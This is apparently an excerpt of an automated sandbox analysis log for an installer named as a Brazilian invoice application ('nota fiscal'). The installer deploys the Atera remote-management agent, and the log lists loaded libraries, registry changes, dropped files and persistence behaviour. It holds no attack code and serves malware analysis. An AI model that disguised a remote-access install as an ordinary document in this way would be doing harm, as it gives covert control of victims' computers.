                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: schannel.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mskeyprotect.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ntasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ncrypt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ncryptsslp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: gpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wtsapi32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winsta.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: devobj.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: tpmcoreprovisioning.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: certenroll.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: devobj.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: certca.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsparse.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: tbs.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: amsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeSection loaded: rasapi32.dll
                                Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File written: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.ini
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\ATERA Networks
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\ATERA Networks\AteraAgent
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe.config
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\ATERA Networks\AteraAgent\Newtonsoft.Json.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\ATERA Networks\AteraAgent\Pubnub.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\ATERA Networks\AteraAgent\System.ValueTuple.dll
                                Source: C:\Windows\System32\msiexec.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}
                                Source: APLICATIVO-WINDOWS-NOTA-FISCAL.msi Static file information: File size 2994176 > 1048576
                                Source: Binary string: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2766545680.000000EFDD1B3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2865179818.0000022052F84000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: CliWrap.Signaler.pdb source: CliWrap.dll.26.dr
                                Source: Binary string: D:\a\1\s\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent\obj\Release\AgentPackageUpgradeAgent.pdbdeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2766545680.000000EFDD1B3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdb source: AgentPackageAgentInformation.exe, 00000015.00000002.1983854282.0000015E7D2E2000.00000002.00000001.01000000.00000018.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2972609455.00000153FD172000.00000002.00000001.01000000.00000049.sdmp, AgentPackageSystemTools.exe, 00000039.00000002.2534525146.0000025FBFA22000.00000002.00000001.01000000.0000003D.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent\obj\Release\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002A.00000002.2865179818.0000022052F62000.00000004.00000020.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002A.00000000.2335964500.0000022039CD2000.00000002.00000001.01000000.00000027.sdmp
                                Source: Binary string: \??\C:\Windows\Installer\MSI5885.tmp-\AlphaControlAgentInstallation.PDB~ source: rundll32.exe, 00000037.00000003.2569504567.0000000002F55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2570515142.0000000002F55000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent\obj\Release\AgentPackageUpgradeAgent.pdbd source: AgentPackageUpgradeAgent.exe, 0000002A.00000000.2335964500.0000022039CD2000.00000002.00000001.01000000.00000027.sdmp
                                Source: Binary string: C:\projects\nlog\src\NLog\obj\Release\net45\NLog.pdb source: AgentPackageMonitoring.exe, 00000023.00000002.2123394942.000001F735D72000.00000002.00000001.01000000.00000024.sdmp
                                Source: BouncyCastle.Crypto.dll.1.dr Static PE information: 0xE49A52B3 [Sun Jul 15 06:22:43 2091 UTC]
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe Code function: 35_2_00007FFDEE3F1910 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 35_2_00007FFDEE3F1910
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFD9B3B7967 push ebx; retf 29_2_00007FFD9B3B796A
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFD9B3B8163 push ebx; ret 29_2_00007FFD9B3B816A
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFD9B3A00BD pushad ; iretd 29_2_00007FFD9B3A00C1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 33_2_00007FFD9B387C18 push eax; retf 5F4Dh33_2_00007FFD9B387D6D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 33_2_00007FFD9B38D699 push es; retf 33_2_00007FFD9B38D847
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 33_2_00007FFD9B377C2E pushad ; retf 33_2_00007FFD9B377C5D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 33_2_00007FFD9B38C2BE pushad ; iretd 33_2_00007FFD9B38C2BF
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 33_2_00007FFD9B3700BD pushad ; iretd 33_2_00007FFD9B3700C1

                                Persistence and Installation Behavior

                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.AppContext.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\x64\SQLite.Interop.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.RegularExpressions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileProviders.Abstractions.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI56F2.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI432A.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Polly.Core.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Compression.ZipFile.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\it\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackages.Exceptions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.Sinks.File.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Handles.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\pl\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XmlDocument.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.Exceptions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\shimgen.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Serilog.Extensions.Logging.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\StructureMap.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\netstandard.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Tasks.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3FBB.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Atera.Agent.Package.Tools.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\zh-Hant\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5085.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\StructureMap.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Numerics.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.CommonLib.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\ATERA Networks\AteraAgent\Pubnub.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2D79.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.NetworkInformation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\t2tWinFormAppBarLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7z.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\NLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Resources.Writer.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2D79.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.InteropServices.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.FileProviders.Abstractions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Atera.AgentPackage.Common.Mutex.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2D79.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XPath.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.CommandLine.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI3FBB.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.NameResolution.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.EventSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.IsolatedStorage.dllJump to dropped file
